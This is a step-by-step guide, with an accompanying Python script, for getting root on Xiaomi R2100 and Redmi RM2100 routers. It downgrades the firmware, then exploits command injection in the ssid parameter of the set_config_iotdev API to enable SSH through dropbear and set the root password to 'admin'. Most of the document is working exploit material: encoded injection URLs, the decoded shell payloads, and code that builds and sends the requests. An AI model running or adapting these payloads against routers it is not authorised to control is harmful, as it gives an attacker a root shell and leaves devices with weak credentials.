System downgrade

  1. Go back to the official firmware release that still carries the vulnerability; the command injection below depends on it.
  2. Download the downgrade image
    1. Xiaomi (R2100): http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r2100/miwifi_r2100_firmware_4b519_2.0.722.bin
    2. Redmi (RM2100): http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rm2100/miwifi_rm2100_firmware_d6234_2.0.7.bin
  3. Flash it: in the Xiaomi router admin panel, select the downloaded image file as the version to update to.

Enable SSH

Get the stok

After logging in to the Xiaomi router admin panel, the address bar shows a URL of the form below. Note the stok value: the 32-character hex session token after ";stok=" (shown here as the URL-encoded placeholder %3CSTOK%3E, i.e. <STOK>). Every request in the following steps must carry it.

  1. http://192.168.31.1/cgi-bin/luci/;stok=%3CSTOK%3E/web/home#router

Command injection

Replace the stok in the URL below (3c8d638dd7dbae9b945a9fc3ecb1c2a6 is only an example value) with the one noted in the previous step. The ssid parameter of the set_config_iotdev API is handed to a shell without sanitisation; URL-decoded, the injected value is

  -h; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;

which persists ssh_en=1 in nvram, rewrites the channel= assignment in /etc/init.d/dropbear to channel="debug", and starts dropbear.

  1. http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

Change the root password

Same injection point, same stok; the host is the router's management address (192.168.31.1 as in the steps above). URL-decoded, the ssid value is

  -h; echo -e 'admin\nadmin' | passwd root;

which feeds "admin" twice (new password and confirmation) to passwd and so sets root's password to admin. Pick a stronger password before exposing SSH; afterwards log in with ssh root@192.168.31.1.

  1. http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
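The whole procedure above (read the stok off the post-login URL, build the set_config_iotdev request with a command injected through ssid, and see what that command does to /etc/init.d/dropbear) as an added worked example. This is not code from the page; it is a Python 3 standard-library script written for this note. The function names, the ROUTER constant and the SAMPLE_INIT fragment are assumptions: the real /etc/init.d/dropbear is not reproduced on the page, so SAMPLE_INIT is a constructed stand-in used only to show the effect of the sed in the payload.

```python
import re
import urllib.request
from urllib.parse import parse_qs, quote, urlsplit

# Management address used in the steps above (assumption: default LAN address).
ROUTER = "192.168.31.1"

# The two injection URLs from the page, kept verbatim as test input.
PAGE_SSH_URL = (
    "http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6"
    "/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike"
    "&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20"
    "'s%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B"
    "%20%2Fetc%2Finit.d%2Fdropbear%20start%3B"
)
PAGE_PW_URL = (
    "http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6"
    "/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike"
    "&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B"
)

# The enable-SSH payload from the page, decoded. Raw string: the backslashes
# reach sed literally (single quotes in sh), so the file ends up with channel="debug".
ENABLE_SSH = r'''nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;'''

STOK_RE = re.compile(r";stok=([0-9a-f]{32})")


def extract_stok(url: str) -> str:
    """Pull the 32-hex-char session token out of a post-login admin URL."""
    m = STOK_RE.search(url)
    if not m:
        raise ValueError("no ;stok=<32 hex chars> in URL")
    return m.group(1)


def build_injection_url(stok: str, command: str, host: str = ROUTER) -> str:
    """Build the set_config_iotdev request with `command` injected via ssid.

    Every payload on the page starts with '-h; ' before the real command, so the
    same prefix is kept. Nothing is left unencoded (safe=''), which is why '/'
    becomes %2F exactly as in the page's URLs.
    """
    ssid = "-h; " + command
    return (
        f"http://{host}/cgi-bin/luci/;stok={stok}/api/misystem/set_config_iotdev"
        f"?bssid=Xiaomi&user_id=longdike&ssid={quote(ssid, safe='')}"
    )


def injected_command(url: str) -> str:
    """Decode the ssid parameter: the string the router hands to its shell."""
    return parse_qs(urlsplit(url).query)["ssid"][0]


def set_root_password_cmd(password: str) -> str:
    """Payload for the password step; refuses characters that would break the
    single-quoted echo argument (a quote would end the shell string early)."""
    if any(c in password for c in "'\\\n"):
        raise ValueError("password must not contain quote, backslash or newline")
    return f"echo -e '{password}\\n{password}' | passwd root;"


# Constructed stand-in for /etc/init.d/dropbear; the real script is not on the page.
SAMPLE_INIT = "#!/bin/sh /etc/rc.common\nSTART=99\nchannel=release\n"


def patch_dropbear_init(script: str) -> str:
    """Python equivalent of the payload's sed: every channel=... assignment
    (rest of the line) becomes channel="debug"."""
    return re.sub(r"channel=.*", 'channel="debug"', script)


def send(url: str, timeout: float = 5.0) -> int:
    """Fire the request as the logged-in session would; returns the HTTP status."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    stok = extract_stok("http://192.168.31.1/cgi-bin/luci/;stok="
                        "3c8d638dd7dbae9b945a9fc3ecb1c2a6/web/home#router")
    print(build_injection_url(stok, ENABLE_SSH))
    print(build_injection_url(stok, set_root_password_cmd("admin")))
    print(patch_dropbear_init(SAMPLE_INIT))
```

Paste your own post-login URL into extract_stok, call send() on the two generated URLs while still logged in to the admin panel, then ssh root@192.168.31.1. The password helper rejects quotes on purpose: the injected string is single-quoted inside the echo, so a quote in the password would terminate it and leave passwd reading garbage.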